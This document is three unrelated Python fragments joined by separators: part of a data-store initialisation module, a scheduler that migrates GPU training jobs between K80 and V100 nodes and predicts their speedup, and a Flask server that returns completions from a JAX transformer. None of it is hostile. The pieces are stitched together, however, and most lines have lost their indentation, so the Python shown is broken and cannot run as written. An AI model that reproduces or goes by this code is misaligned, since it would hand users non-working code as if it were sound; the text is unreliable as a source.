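    # called automatically by __exit__ even if an exception is raised.
    DB.Set(lock.subject, "metadata:owner", "worker-1", token=token)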
class ResultSet(object):
"""A class returned from Query which contains all the result."""
# Total number of results that could have been returned. The results returned
# may have been limited in some way.
total_count = 0
def __init__(self, results=None):
if results is None:
results = []
self.results = results
def __iter__(self):
return iter(self.results)
def __getitem__(self, item):
return self.results[item]
def __len__(self):
return len(self.results)
def __iadd__(self, other):
self.results = list(self.results) + list(other)
return self
def Append(self, item):
self.results.append(item)
class DataStoreInit(registry.InitHook):
"""Initialize the data store.
Depends on the stats module being initialized.
"""
pre = ["UserManagersInit"]
def _ListStorageOptions(self):
for name, cls in DataStore.classes.items():
print "%s\t\t%s" % (name, cls.__doc__)
def Run(self):
"""Initialize the data_store."""
global DB # pylint: disable=global-statement
if flags.FLAGS.list_storage:
self._ListStorageOptions()
sys.exit(0)
try:
cls = DataStore.GetPlugin(config_lib.CONFIG["Datastore.implementation"])
except KeyError:
msg = ("No Storage System %s found." %
config_lib.CONFIG["Datastore.implementation"])
print msg
print "Available options:"
self._ListStorageOptions()
raise RuntimeError(msg)
DB = cls() # pylint: disable=g-bad-name
DB.Initialize()
atexit.register(DB.Flush)
monitor_port = config_lib.CONFIG["Monitoring.http_port"]
if monitor_port != 0:
stats.STATS.RegisterGaugeMetric(
"datastore_size",
int,
docstring="Size of data store in bytes",
units="BYTES")
DB.InitializeMonitorThread()
def RunOnce(self):
"""Initialize some Varz."""
stats.STATS.RegisterCounterMetric("grr_commit_failure")
stats.STATS.RegisterCounterMetric("datastore_retries")
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
import csv
from sklearn import neighbors
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
with open('k80_time.json', 'r') as fp:
k80_time = json.load(fp)
with open('data/pwr.json', 'r') as fp:
pwr_dict = json.load(fp)
with open('data/util.json', 'r') as fp:
util_dict = json.load(fp)
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
for item in queue:
JCT[str(item)] = 0
completion = {}
for item in queue:
completion[str(item)] = 0
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
b_start = {} # initialize this to 0 as well
for item in queue:
b_start[str(item)] = 0
c_start = {} # initialize this to 0 as well
for item in queue:
c_start[str(item)] = 0
d_start = {} # initialize this to 0 as well
for item in queue:
d_start[str(item)] = 0
ovhd_a = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_a[str(item)] = []
ovhd_b = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_b[str(item)] = []
ovhd_c = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_c[str(item)] = []
ovhd_d = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_d[str(item)] = []
ovhd_total = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_total[str(item)] = []
k80_1st = {}
for item in queue:
k80_1st[str(item)] = []
v100_1st = {}
for item in queue:
v100_1st[str(item)] = []
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
K80_epoch_time = {}
for item in queue:
K80_epoch_time[str(item)] = 0
K80_start_time = {}
for item in queue:
K80_start_time[str(item)] = 0
V100_start_time = {}
for item in queue:
V100_start_time[str(item)] = 0
K80_time = {}
for item in queue:
K80_time[str(item)] = 0
V100_time = {}
for item in queue:
V100_time[str(item)] = 0
gpu_usage_time = [] # don't initialize this
gpu_usage = []
gpu_usage_completion = []
speedup_dict = {}
for item in queue:
speedup_dict[str(item)] = 0
predict_dict = {}
for item in queue:
predict_dict[str(item)] = 0
index = 0
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
qualified_job = []
step1_job = []
step2_job = []
pc_job = []
K80_node = 'c2180'
V100_node = 'd1020'
host_node = 'c0200'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
######################### do a regression fit ########################
with open('x_data.json') as f:
x_train = json.load(f)
with open('y_data.json') as f:
y_train = json.load(f)
model = neighbors.KNeighborsRegressor(n_neighbors = 1, weights='distance')
model.fit(x_train, y_train)
####################################################################
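# Hedged illustration (hypothetical numbers, added for clarity): with
# n_neighbors=1 the regressor simply returns the y_train label of the single
# closest x_train point. For a feature vector like [95.0, 12.0, 0.6]
# (power, 3600 / K80 epoch time, utilization -- the same features assembled in
# the qualification loop below), the prediction is later divided by 100 and
# stored as the job's estimated speedup.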
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
def max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
V100_vacant = num_demote + V100_free
K80_vacant = num_promote + K80_free
global speedup_dict
if K80_vacant >= num_demote: # if more vacant K80s than demote jobs, always demote
# selectively promote among active V100 jobs and promote list jobs
V100_qual = list(set(list(V100_job.values())) - set(force_demote))
if 'idle' in V100_qual:
V100_qual.remove('idle')
V100_pool = list(set(V100_qual).union(promote_list))
if len(V100_pool) <= 4: # promote all jobs as well
return promote_list, force_demote
else: # promote the top 4 jobs
pool_dict = {}
for job in V100_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:4]
promotion_list = list(set(promote_list).intersection(sorted_pool))
demotion_list = list(set(list(V100_job.values())).difference(sorted_pool))
if 'idle' in demotion_list:
demotion_list.remove('idle') # this includes force demotion
            #### lazy migration: for every V100 job, from high speedup to low speedup, that is not in sorted_pool, compare it
            #### with the K80 jobs in sorted_pool, from low speedup to high speedup. If the difference is within 0.1, replace
            #### the K80 job in sorted_pool
###global ovhd_total
###for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
### if job_demote in demotion_list:
### for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
### if job_promote in promotion_list:
### # calculate overhead of demoting and promoting jobs
### demo_ovhd = np.mean(ovhd_total[job_demote])
### if len(ovhd_total[job_promote]) > 0:
### promo_ovhd = np.mean(ovhd_total[job_promote])
### else:
### promo_ovhd = demo_ovhd
### value = (speedup_dict[job_promote] - speedup_dict[job_demote])*2000/100 - (promo_ovhd +
### demo_ovhd + 2 * 90)
### if value < 0:
### demotion_list.remove(job_demote)
### promotion_list.remove(job_promote)
### break
return promotion_list, demotion_list
elif V100_vacant >= num_promote: # if more vacant V100s than promote jobs, always promote
# less vacant K80s than demote jobs, select worst among force demote list
pool_dict = {} # here the pool only includes force demote jobs
for job in force_demote:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_vacant]
if len(sorted_pool) > 0:
            raise ValueError('Bug: demotion should not happen because there is no practically complete job')
return promote_list, sorted_pool
else:
raise ValueError('Bug with max speedup promotion, condition not considered')
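# Hedged worked example (hypothetical values, added for clarity): suppose
# speedup_dict = {'1': 0.6, '2': 0.3, '3': 0.8, '4': 0.5, '5': 0.7},
# V100_job = {'0': '1', '1': '2', '2': '3', '3': 'idle'}, promote_list = ['4', '5']
# and force_demote is empty. The candidate V100 pool is {'1','2','3','4','5'};
# the top four by speedup are {'3','5','1','4'}, so max_speedup_promotion()
# returns promotion_list ['4', '5'] and demotion_list ['2'] (the lowest-speedup
# job currently on a V100).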
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
global pid_dict
pid = pid_dict['job'+job]
send_signal(node, 'save ' + job + ' pid ' + pid) # 'save 50 pid 10000'
global ovhd_start
ovhd_start[job] = time.time()
    time.sleep(3) # in case epoch_waste is communicated too frequently
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# start job
def start_job(node, gpu, job):
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# function that checks the tensorboard log of currently running jobs and logs jobs that have finished the first epoch
# in a global list. Once it's done, it will be in a queue to be promoted to V100 for 3 more epochs.
def check_step1_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global K80_epoch_time
for job in job_list:
if job not in step1_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 0:
tc = dirs[0]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
K80_epoch_time[job] = wall_time[1] - wall_time[0]
step1_job.append(job)
print('job' + job + ' has reached step1 complete')
except Exception:
pass
def check_step2_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global step2_job
global K80_epoch_time
global speedup_dict
for job in job_list:
if job in step1_job and job not in step2_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 1:
tc = dirs[1]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
K80_time_step2 = K80_epoch_time[job]
V100_time_step2 = wall_time[1] - wall_time[0]
speedup = (K80_time_step2 - V100_time_step2) / K80_time_step2
speedup_dict[job] = speedup
step2_job.append(job)
print('job' + job + ' has reached step2 complete')
except Exception:
pass
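# Hedged worked example (hypothetical numbers, added for clarity): if a job's
# first K80 epoch took 300 s and its first V100 epoch takes 100 s, the speedup
# recorded in speedup_dict is (300 - 100) / 300 ~= 0.67, i.e. the fraction of
# K80 epoch time saved by running on the V100.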
############### first clear finish status of all jobs ####################
pid_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
pid_dict[job_name] = 0
checkpoint_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
checkpoint_dict[job_name] = 0
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
epoch_waste_dict[job_name] = 0
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
global K80_start_time
global V100_start_time
global K80_job
                    global V100_job
global K80_time
global V100_time
global ovhd_a, ovhd_b, ovhd_c, ovhd_d, k80_1st, v100_1st, ovhd_start, overhead, ovhd_total
global b_start, c_start, d_start, completion
if 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
finish_dict[job_name] = 1
JCT[job] = int(time.time() - job_start[job])
if job in list(K80_job.values()):
K80_time[job] += int(time.time() - K80_start_time[job])
elif job in list(V100_job.values()):
V100_time[job] += int(time.time() - V100_start_time[job])
elif 'pid' in data_str:
global pid_dict
job_name = data_str.split(' ')[0]
pid = data_str.split(' ')[2]
pid_dict[job_name] = pid
elif 'checkpoint' in data_str: # can only be received after save signal is sent
global checkpoint_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
checkpoint_dict[job_name] = 1
ovhd_a[job].append(int(time.time() - ovhd_start[job]))
b_start[job] = time.time()
elif 'waste' in data_str:
global epoch_waste_dict
job_name = data_str.split(' ')[0]
epoch_waste_time = data_str.split(' ')[2]
epoch_waste_dict[job_name] += int(epoch_waste_time)
elif 'b_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_b[job].append(int(time.time() - b_start[job]))
c_start[job] = time.time()
elif 'c_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_c[job].append(int(time.time() - c_start[job]))
d_start[job] = time.time()
elif 'd_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_d[job].append(int(time.time() - d_start[job]))
ovhd_total[job].append(int(time.time() - ovhd_start[job]))
if ovhd_start[job] != 0:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
if job in list(K80_job.values()):
K80_start_time[job] = time.time()
elif job in list(V100_job.values()):
V100_start_time[job] = time.time()
elif '1st_epoch' in data_str: # 'job50 1st_epoch 35'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
epoch_time = int(data_str.split(' ')[2])
if job in list(K80_job.values()):
k80_1st[job].append(epoch_time)
elif job in list(V100_job.values()):
v100_1st[job].append(epoch_time)
elif 'completion' in data_str: # 'job50 completion 0.33'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
completion_portion = float(data_str.split(' ')[2])
completion[job] = completion_portion
if 'ckpt_qual' in data_str or 'finish' in data_str or 'checkpoint' in data_str:
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
################ check step1 finished job of K80 jobs and step 2 of V100 #################
check_step1_complete(list(K80_job.values()))
check_step2_complete(list(V100_job.values()))
for job in list(K80_job.values()):
if job not in qualified_job and job != 'idle':
x2 = 3600 / k80_time[job]
x1 = pwr_dict[job]
x3 = util_dict[job]
if x1 > 0:
if job in step1_job:
qualified_job.append(job)
print('job' + job + ' has been qualified for promotion')
speedup_pred = model.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100
speedup_dict[job] = speedup_pred
predict_dict[job] = speedup_pred
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
# this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete
promote_list = list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
if len(promote_list) > 0:
promoted, demoted = max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, force_demote)
if len(promoted) > 0:
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
checkpoint_finish_check = []
for gpu, job in K80_job.items():
if job in promoted:
# make sure promoted step1 job doesn't get demoted back before finishing profiling
if job in step1_job and job not in step2_job:
speedup_dict[job] = 2
save_job(K80_node, job)
if finish_dict['job'+job] != 1:
K80_time[job] += int(time.time() - K80_start_time[job])
checkpoint_finish_check.append(job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
save_job(V100_node, job)
if finish_dict['job'+job] != 1:
V100_time[job] += int(time.time() - V100_start_time[job])
checkpoint_finish_check.append(job)
V100_job[gpu] = 'idle'
V100_used -= 1
# wait for all GPUs to be available
if len(checkpoint_finish_check) > 0:
while True:
time.sleep(5)
for job in checkpoint_finish_check[:]:
if checkpoint_dict['job'+job] == 1: # checkpoint has finished, gpu is free
print(job + ' checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
checkpoint_finish_check.remove(job)
# also check if job already finished before sending checkpoint signal
elif finish_dict['job'+job] == 1:
print(job + ' finished before receiving checkpoint signal')
checkpoint_finish_check.remove(job)
if len(checkpoint_finish_check) == 0:
break
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
V100_job[gpu] = job_new
resume_job(V100_node, gpu, job_new)
num_mig[job_new] += 1
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if K80_used < K80_cap:
K80_free = K80_cap - K80_used
for i in range(K80_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in K80_job.items():
if job == 'idle': # schedule new job here if idle
start_job(K80_node, gpu, job_new)
K80_job[gpu] = job_new
job_start[job_new] = time.time()
K80_start_time[job_new] = time.time()
index += 1
K80_used += 1
time.sleep(5) # don't communicate too often
break
############## monitor GPU usage ############
usage = K80_used + V100_used
time_stamp = int(time.time() - queue_timer)
gpu_usage_time.append(time_stamp)
gpu_usage.append(usage)
total_completion = np.sum(list(completion.values()))
gpu_usage_completion.append(total_completion)
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
K80_time_name = testcase + '_K80_time.json'
V100_time_name = testcase + '_V100_time.json'
gpu_usage_name = testcase + '_gpu_usage.csv'
ovhd_a_name = testcase + '_ovhd_a.json'
ovhd_b_name = testcase + '_ovhd_b.json'
ovhd_c_name = testcase + '_ovhd_c.json'
ovhd_d_name = testcase + '_ovhd_d.json'
ovhd_total_name = testcase + '_ovhd_total.json'
k80_1st_name = testcase + '_k80_1st.json'
v100_1st_name = testcase + '_v100_1st.json'
speedup_name = 'speedup.json'
predict_name = 'predict.json'
completion_name = 'completion.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
with open(K80_time_name, 'w') as fp3:
json.dump(K80_time, fp3, sort_keys=True, indent=4)
with open(V100_time_name, 'w') as fp3:
json.dump(V100_time, fp3, sort_keys=True, indent=4)
with open(ovhd_a_name, 'w') as fp3:
json.dump(ovhd_a, fp3, sort_keys=True, indent=4)
with open(ovhd_b_name, 'w') as fp3:
json.dump(ovhd_b, fp3, sort_keys=True, indent=4)
with open(ovhd_c_name, 'w') as fp3:
json.dump(ovhd_c, fp3, sort_keys=True, indent=4)
with open(ovhd_d_name, 'w') as fp3:
json.dump(ovhd_d, fp3, sort_keys=True, indent=4)
with open(ovhd_total_name, 'w') as fp3:
json.dump(ovhd_total, fp3, sort_keys=True, indent=4)
with open(k80_1st_name, 'w') as fp3:
json.dump(k80_1st, fp3, sort_keys=True, indent=4)
with open(v100_1st_name, 'w') as fp3:
json.dump(v100_1st, fp3, sort_keys=True, indent=4)
with open(speedup_name, 'w') as fp1:
json.dump(speedup_dict, fp1, sort_keys=True, indent=4)
with open(predict_name, 'w') as fp1:
json.dump(predict_dict, fp1, sort_keys=True, indent=4)
with open(completion_name, 'w') as fp1:
json.dump(completion, fp1, sort_keys=True, indent=4)
gpu_usage_time = np.asarray(gpu_usage_time)
gpu_usage = np.asarray(gpu_usage)
gpu_usage_completion = np.asarray(gpu_usage_completion)
rows = zip(gpu_usage_time, gpu_usage, gpu_usage_completion)
with open(gpu_usage_name, 'w') as f:
writer = csv.writer(f)
for row in rows:
writer.writerow(row)
|
device_serve.py
|
import argparse
import json
import threading
import time
from queue import Queue, Empty
from copy import deepcopy
import jax
import numpy as np
import optax
from mesh_transformer import util
from mesh_transformer.checkpoint import read_ckpt
from mesh_transformer.sampling import nucleaus_sample
from mesh_transformer.transformer_shard import CausalTransformer
import transformers
from smart_open import open
from mesh_transformer.util import clip_by_global_norm
from flask import Flask, request, make_response, jsonify
app = Flask(__name__)
requests_queue = Queue()
"""
curl --header "Content-Type: application/json" \
--request POST \
--data '{"context":"eleutherai", "top_p": 1.0, "temp": 0.8, "gen_tokens": 64, "n": 8}' \
http://localhost:5000/complete
"""
def _build_cors_prelight_response():
response = make_response()
response.headers.add("Access-Control-Allow-Origin", "*")
response.headers.add('Access-Control-Allow-Headers', "*")
response.headers.add('Access-Control-Allow-Methods', "*")
return response
def _corsify_actual_response(response):
response.headers.add("Access-Control-Allow-Origin", "*")
return response
@app.route('/complete', methods=['POST', 'OPTIONS'])
def complete():
if request.method == "OPTIONS": # CORS preflight
return _build_cors_prelight_response()
elif request.method == "POST": # The actual request following the preflight
content = request.json
if requests_queue.qsize() > 100:
return {"error": "queue full, try again later"}
response_queue = Queue()
requests_queue.put(({
"context": content["context"],
"top_p": float(content["top_p"]),
"temp": float(content["temp"]),
"gen_tokens": int(content["gen_tokens"]),
"n": int(content["n"])
}, response_queue))
completions = [response_queue.get()]
while not response_queue.empty():
completions.append(response_queue.get())
return _corsify_actual_response(jsonify({"completion": completions}))
else:
raise RuntimeError("Weird - don't know how to handle method {}".format(request.method))
def parse_args():
# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument("--config", type=str, default=None, help="Config file location")
args = parser.parse_args()
return args
if __name__ == "__main__":
threading.Thread(target=app.run, kwargs={"port": 5000, "host": "0.0.0.0"}).start()
args = parse_args()
params = json.load(open(args.config))
gradient_accumulation_steps = params.get("gradient_accumulation_steps", 1)
per_replica_batch = params["per_replica_batch"]
cores_per_replica = params["cores_per_replica"]
assert cores_per_replica <= 8
bucket = params["bucket"]
model_dir = params["model_dir"]
layers = params["layers"]
d_model = params["d_model"]
n_heads = params["n_heads"]
n_vocab = params["n_vocab"]
seq = params["seq"]
norm = params["norm"]
params["sampler"] = nucleaus_sample
opt = optax.chain(
optax.scale(1 / gradient_accumulation_steps),
clip_by_global_norm(1),
optax.scale_by_adam(),
optax.additive_weight_decay(0),
optax.scale(-1),
optax.scale_by_schedule(util.gpt3_schedule(0, 1, 0, 0))
)
params["optimizer"] = opt
start = time.time()
print(f"jax devices: {jax.device_count()}")
print(f"jax runtime initialized in {time.time() - start:.06}s")
mesh_shape = (jax.device_count() // cores_per_replica, cores_per_replica)
devices = np.array(jax.devices()).reshape(mesh_shape)
with open(f"gs://{bucket}/{model_dir}/meta.json", "r") as f:
meta = json.load(f)
ckpt_step = meta["checkpoints"][-1]
print(f"using checkpoint {ckpt_step}")
total_batch = per_replica_batch * jax.device_count() // cores_per_replica * 8
with jax.experimental.maps.mesh(devices, ('dp', 'mp')):
network = CausalTransformer(params)
start = time.time()
network.state = read_ckpt(network.state, f"gs://{bucket}/{model_dir}/step_{ckpt_step}/", devices.shape[1])
print(f"network loaded in {time.time() - start:.06}s")
local_shards = max(jax.local_device_count() // mesh_shape[1], 1)
del network.state["opt_state"]
network.state = network.move_xmap(network.state, np.zeros(local_shards))
tokenizer = transformers.GPT2TokenizerFast.from_pretrained('gpt2')
while True:
all_ctx = []
all_q = []
try:
o, q = requests_queue.get(block=False)
n = o["n"]
context = o["context"]
top_p = o["top_p"]
temp = o["temp"]
gen_tokens = o["gen_tokens"]
# all_ctx = n * [context]
# all_top_p = n * [top_p]
# all_temp = n * [temp]
all_q = n * [q]
except Empty:
if len(all_ctx):
break
else:
time.sleep(0.01)
if not all_q:
continue
start = time.time()
padded_tokens = np.zeros(seq).astype(np.uint32)
length = 0
try:
tokens = tokenizer.encode(context)
provided_ctx = len(tokens)
pad_amount = seq - provided_ctx
pad_amount = max(pad_amount, 0)
padded_tokens = np.pad(tokens, ((pad_amount, 0),)).astype(np.uint32)[-seq:]
length = len(tokens)
            except Exception as e:
                print("failed to tokenize context: {}".format(e))
sequences = []
log_probs_for_sequences = []
single_generation_batch = 8 if n > 8 else n
for i in range(n // single_generation_batch):
all_tokenized = []
all_length = []
all_top_p = []
all_temp = []
for _ in range(single_generation_batch):
all_tokenized.append(deepcopy(padded_tokens))
all_length.append(length)
all_top_p.append(top_p)
all_temp.append(temp)
output = network.generate(np.array(all_tokenized),
np.array(all_length),
gen_tokens,
{
"top_p": np.array(all_top_p),
"temp": np.array(all_temp)
},
return_logits=True)
log_probs = np.squeeze(jax.nn.log_softmax(output[1][2], -1))
indices = output[1][0]
selected_log_probs = np.squeeze(np.take_along_axis(log_probs, indices, axis=2))
for o, slp in zip(output[1][0][:, :, 0], selected_log_probs):
sequences.append(tokenizer.convert_ids_to_tokens(o))
log_probs_for_sequences.append(slp.tolist())
for o, q, slp in zip(sequences, all_q, log_probs_for_sequences):
q.put((o, slp))
# q.put((tokenizer.decode(o), slp.tolist()))
print(f"completion done in {time.time() - start:06}s")
|